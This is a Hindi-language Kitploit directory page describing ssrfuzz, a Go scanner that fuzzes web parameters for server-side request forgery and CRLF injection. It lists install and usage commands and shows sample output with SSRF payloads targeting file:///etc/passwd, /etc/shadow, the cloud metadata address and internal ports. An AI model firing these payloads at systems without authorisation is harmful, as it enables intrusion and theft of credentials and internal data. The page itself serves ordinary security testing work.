Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ssrfuzz — SSRFuzz एक उपकरण है जो सर्वर साइड रिक्वेस्ट फोर्जरी कमजोरियों को खोजने के लिए है, जिसमें CRLF श्रृंखलन क्षमताएं हैं। | Kitploit
उपकरण/GitHubGitHub/ryandamour/ssrfuzz
भेद्यता स्कैनरवेब एप्लिकेशन शोषणवेब सुरक्षाफज़िंग
GitHubryandamour/ssrfuzz

ssrfuzz

SSRFuzz एक उपकरण है जो सर्वर साइड रिक्वेस्ट फोर्जरी कमजोरियों को खोजने के लिए है, जिसमें CRLF श्रृंखलन क्षमताएं हैं।

रिपॉजिटरी देखें
1832135 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

SSRFUZZ

SSRFuzz एक उपकरण है जो सर्वर साइड रिक्वेस्ट फोर्जरी (SSRF) कमजोरियों को खोजने के लिए है, जिसमें CRLF चेनिंग की क्षमता है।

क्यों?

  • मैं समवर्तीता के लिए Golang में एक उपकरण लिखना चाहता था
  • मैं SSRF कमजोरियों के लिए पैरामीटर फ़ज़ करना चाहता था, साथ ही CRLF इंजेक्शन के लिए दोनों पथ और पैरामीटर फ़ज़ करना चाहता था
  • मैं Orange के काम से प्रेरित हुआ था जो इस प्रकार की कमजोरियों को चेन करने के लिए था (https://blog.orange.tw)

इंस्टॉलेशन

इंस्टॉल करने के लिए निम्नलिखित कमांड चलाएँ:

root@kitploit:~
go get -u github.com/ryandamour/ssrfuzz

उपयोग

root@kitploit:~

  ██████   ██████  ██▀███    █████▒█    ██ ▒███████▒▒███████▒
▒██    ▒ ▒██    ▒ ▓██ ▒ ██▒▓██   ▒ ██  ▓██▒▒ ▒ ▒ ▄▀░▒ ▒ ▒ ▄▀░
░ ▓██▄   ░ ▓██▄   ▓██ ░▄█ ▒▒████ ░▓██  ▒██░░ ▒ ▄▀▒░ ░ ▒ ▄▀▒░ 
  ▒   ██▒  ▒   ██▒▒██▀▀█▄  ░▓█▒  ░▓▓█  ░██░  ▄▀▒   ░  ▄▀▒   ░
▒██████▒▒▒██████▒▒░██▓ ▒██▒░▒█░   ▒▒█████▓ ▒███████▒▒███████▒
▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░ ▒▓ ░▒▓░ ▒ ░   ░▒▓▒ ▒ ▒ ░▒▒ ▓░▒░▒░▒▒ ▓░▒░▒
░ ░▒  ░ ░░ ░▒  ░ ░  ░▒ ░ ▒░ ░     ░░▒░ ░ ░ ░░▒ ▒ ░ ▒░░▒ ▒ ░ ▒
░  ░  ░  ░  ░  ░    ░░   ░  ░ ░    ░░░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░
      ░        ░     ░               ░       ░ ░      ░ ░    
                                           ░        ░        

===============================================================
SSRFUZZ 1.2
by Ryan D'Amour @ryandamour 
===============================================================आपकी सभी SSRF फ़ज़िंग आवश्यकताओं के लिए एक स्कैनर

उपयोग:
  ssrfuzz scan [flags]

फ़्लैग्स:
  -b, --call-back string       SSRF फ़ज़िंग के लिए कॉलबैक जोड़ें (जैसे: https://github.com/ropnop/serverless_toolkit/tree/master/ssrf_slack)
  -c, --cookie string          अनुरोधों के लिए कुकी
      --crlf-path              सभी उपलब्ध पथों में CRLF पेलोड जोड़ें (जैसे: site.com/%0Atest.php)
      --delay int              प्रत्येक थ्रेड अनुरोधों के बीच जितना समय प्रतीक्षा करता है, मिलीसेकंड में (डिफ़ॉल्ट 100)
  -d, --domains string         स्कैन करने के लिए पैरामीटर वाले डोमेन का स्थान
  -h, --help                   स्कैन के लिए सहायता
  -x, --http-method string     HTTP विधि - GET या POST (डिफ़ॉल्ट "GET")
  -o, --output string          परिणाम सहेजने का स्थान
      --skip-crlf              CRLF फ़ज़िंग छोड़ें
      --skip-network           नेटवर्क फ़ज़िंग छोड़ें
      --skip-scheme            स्कीम फ़ज़िंग छोड़ें
  -s, --slack-webhook string   स्लैक वेबहुक खोजों को एक चैनल पर भेजने के लिए
  -t, --threads int            ssrfuzz चलाने के लिए थ्रेड की संख्या (डिफ़ॉल्ट 50)
      --timeout int            एक कनेक्शन को बंद करने के लिए आवश्यक समय जो लटका हो सकता है (डिफ़ॉल्ट 10)
  -u, --user-agent string      अनुरोधों के लिए उपयोगकर्ता एजेंट (डिफ़ॉल्ट "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36")
  -v, --verbose                विस्तृत आउटपुट
root@kitploit:~
उपयोग: 
echo "http://url_to_fuzz" | ssrfuzz scan
cat file_of_domains.txt | ssrfuzz scan
ssrfuzz scan -d file_of_domains.txt
root@kitploit:~
* CRLF के साथ http और scheme पेलोड स्कैन करना:

echo "http://192.168.1.10/test.php?u=" | go run main.go scan
 
[!] Scheme payload match:
* http://192.168.1.10/test.php?u=file://etc/passwd 200

[!] Interesting payloads found
* http://192.168.1.10/test.php?u=http://127.1.0.0:80 200
* http://192.168.1.10/test.php?u=http://127.1.0.0:8080 500
* http://192.168.1.10/test.php?u=http://127.1.0.0:443 500
* http://192.168.1.10test.php?u=http://127.1.0.0:22 500
* http://192.168.1.10/test.ph?u=http://127.1.0.0:25 500
* http://192.168.1.10/test.php?u=http://127.1.0.0:445 500

[!] Interesting payloads found
* http://192.168.1.10/test.php?u=http://127.127.127.127:80%23%OA 200
* http://192.168.1.10/test.php?u=http://127.127.127.127:80%23%OA 200
* http://192.168.1.10/test.php?u=http://127.127.127.127:8080%23%OA 500
* http://192.168.1.10/test.php?u=http://127.127.127.127:8080%23%OA 500
root@kitploit:~
* केवल http पेलोड CRLF के साथ स्कैन करना:

echo "http://192.168.1.10/test.php?u=" | go run main.go scan --skip-scheme

[!] Interesting payloads found
* http://192.168.1.10/test.php?u=http://127.127.127.127:80%23%OA 200
* http://192.168.1.10/test.php?u=http://127.127.127.127:80%23%OA 200
* http://192.168.1.10/test.php?u=http://127.127.127.127:8080%23%OA 500
* http://192.168.1.10/test.php?u=http://127.127.127.127:8080%23%OA 500
* http://192.168.1.10/test.php?u=http://127.127.127.127:443%23%OA 500
* http://192.168.1.10/test.php?u=http://127.127.127.127:443%23%OA 500
* http://192.168.1.10/test.php?u=http://127.127.127.127:25%23%OA 500
* http://192.168.1.10/test.php?u=http://127.127.127.127:25%23%OA 500
* http://192.168.1.10/test.php?u=http://127.127.127.127:22%23%OA 500
* http://192.168.1.10/test.php?u=http://127.127.127.127:22%23%OA 500
* http://192.168.1.10/test.php?u=http://127.127.127.127:445%23%OA 500
* http://192.168.1.10/test.php?u=http://127.127.127.127:445%23%OA 500
root@kitploit:~
* CRLF के बिना केवल http पेलोड स्कैन करना:

echo "http://192.168.1.10/test.php?u=" | go run main.go scan --skip-scheme --skip-crlf

[!] Interesting payloads found
* http://192.168.1.10/test.php?u=http://127.1.0.0:80 200
* http://192.168.1.10/test.php?u=http://127.1.0.0:8080 500
* http://192.168.1.10/test.php?u=http://127.1.0.0:443 500
* http://192.168.1.10/test.php?u=http://127.1.0.0:22 500
* http://192.168.1.10/test.php?u=http://127.1.0.0:25 500
* http://192.168.1.10/test.php?u=http://127.1.0.0:445 500
root@kitploit:~
* CRLF के बिना केवल scheme पेलोड स्कैन करना:

echo "http://192.168.1.10/test.php?u=" | go run main.go scan --skip-network --skip-crlf

[!] Interesting payloads found
* http://192.168.1.10/test.php?u=file:///etc/passwd 200
* http://192.168.1.10/test.php?u=file:///etc/shadow 500
* http://192.168.1.10/test.php?u=file://169.254.169.254/ 500

योगदान

पुल अनुरोधों का स्वागत है। बड़े बदलावों के लिए, कृपया पहले एक इश्यू खोलें ताकि आप जो बदलना चाहते हैं उस पर चर्चा कर सकें।

कृपया सुनिश्चित करें कि उपयुक्त परीक्षण अपडेट करें।

लाइसेंस

MIT

प्रायोजित

Stage2Security alt text

टूल डाउनलोड करें